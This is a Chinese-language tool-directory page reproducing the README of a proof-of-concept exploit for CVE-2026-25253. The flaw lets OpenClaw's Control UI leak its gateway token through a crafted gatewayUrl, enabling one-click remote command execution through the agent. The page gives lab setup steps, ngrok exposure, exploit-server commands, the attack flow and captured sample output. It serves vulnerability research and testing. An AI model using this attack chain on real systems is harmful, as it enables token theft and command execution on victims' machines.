Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-25253 — OpenClaw 身份验证令牌窃取 | Kitploit
工具/GitHubGitHub/eqstlab/cve-2026-25253
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试红队Payload 开发
GitHubeqstlab/cve-2026-25253

CVE-2026-25253

OpenClaw 身份验证令牌窃取

查看仓库
23个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-25253 OpenClaw 一键RCE

★ CVE-2026-25253 OpenClaw 一键远程代码执行 PoC ★

https://github.com/user-attachments/assets/e6957c61-7549-4e68-831e-a05436504a3e

描述

CVE-2026-25253:OpenClaw 认证令牌泄露漏洞

OpenClaw(又称 clawdbot 或 Moltbot)在 v2026.1.29 之前,攻击者可通过向 Control UI 提供精心构造的 gatewayUrl 查询字符串值来窃取已存储的网关认证令牌,该界面会自动建立 WebSocket 连接,而无需验证或用户确认。这可能导致未授权的网关访问和一键远程代码执行。

环境要求

  • Docker(Windows 上使用 Docker Desktop)
  • Python 3.x(攻击端)

文件

  • Dockerfile — 构建 OpenClaw 漏洞环境
  • templates/ — 漏洞利用所使用的恶意网页
  • config.txt — 受害者环境中使用的 OpenClaw 配置
  • exploit.py — 漏洞利用服务器
  • requirements.txt — PoC 依赖

环境搭建

  1. 构建 Docker 镜像
root@kitploit:~
docker build -t openclaw-vuln .
  1. 运行环境(Windows)
root@kitploit:~
docker run -d --name openclaw-vuln -p 127.0.0.1:2222:22 openclaw-vuln
  1. 创建 SSH 隧道
root@kitploit:~
ssh-keygen -R [127.0.0.1]:2222
ssh -N -L 18789:127.0.0.1:18789 -p 2222 [email protected]
  • 密码:openclawlab
  1. 访问 OpenClaw Control UI 在浏览器中打开以下 URL
root@kitploit:~
http://127.0.0.1:18789/
  1. 输入网关令牌 d4b7c7689b82981ff86c735a9f8f616b310491b0d334659a1491c55a13353e66
  2. 点击 连接
  3. 打开 配置 选项卡
  4. 粘贴 config.txt 的内容
  5. 使用你的 OpenAI API 密钥替换 API 密钥字段
  6. 保存配置
  7. 确认 agent 响应正常

概念验证(PoC)

  1. 安装依赖(攻击端)
root@kitploit:~
pip3 install -r requirements.txt
  1. 通过 HTTPS 暴露漏洞利用服务器
root@kitploit:~
wget https://bin.equinox.io/c/bNyj1mQVY4c/ngrok-v3-stable-linux-amd64.tgz
tar xzf ngrok-v3-stable-linux-amd64.tgz
./ngrok authtoken YOUR_TOKEN
./ngrok http 13337
  • 复制生成的转发主机名
  1. 运行漏洞利用服务器
root@kitploit:~
python3 exploit.py --host YOUR_NGROK_HOSTNAME --command "env"

示例:

root@kitploit:~
python3 exploit.py --host abcd-1234.ngrok-free.app --command "env"
  1. 触发攻击
  1. 打开漏洞利用服务器暴露的恶意页面
  2. 模拟受害者与页面交互
  3. 从浏览器触发漏洞利用流程

攻击流程

  1. 恶意 URL 更改受害者 Control UI 的 gatewayUrl
  2. 浏览器自动连接到攻击者控制的 WebSocket 端点
  3. 网关认证令牌泄露给攻击者
  4. 恶意页面使用窃取的令牌与受害者的本地 OpenClaw 网关建立新的 WebSocket 连接
  5. 通过 agent 发送命令执行请求
  6. 执行结果返回给攻击者服务器

预期结果

  • 受害者浏览器被重定向到恶意 WebSocket 流程
  • 网关认证令牌被攻击者捕获
  • 攻击者可以通过 OpenClaw 发送命令执行请求
  • 命令输出返回给攻击者服务器

示例输出

root@kitploit:~
[*] Exploit Server running on: abcd-1234.ngrok-free.app:13337
[*] Gateway token captured: d4b7c7689b82981ff86c735a9f8f616b310491b0d334659a1491c55a13353e66

==================================================
      [!] EXPLOIT RESULT CAPTURED [!]
==================================================
HOSTNAME=openclaw-vuln
PWD=/root
HOME=/root
...
==================================================

注意事项

  • 此 PoC 针对 OpenClaw 2026.1.24-1
  • 该攻击链依赖于 Control UI 中易受攻击的 gatewayUrl 处理
  • 要远程访问受害者,恶意页面必须通过 HTTPS 提供
  • 通过受害者浏览器作为桥梁访问本地 OpenClaw 网关

EQST 洞见

我们每月发布一次 CVE 和恶意软件分析。如果您感兴趣,请通过以下链接查看我们的文章。

  • KR : https://www.skshieldus.com/security-insights/reports/eqst_openclaw_rce_vulnerability
  • EN : https://www.skshieldus.com/en/report?tab=eqst
下载工具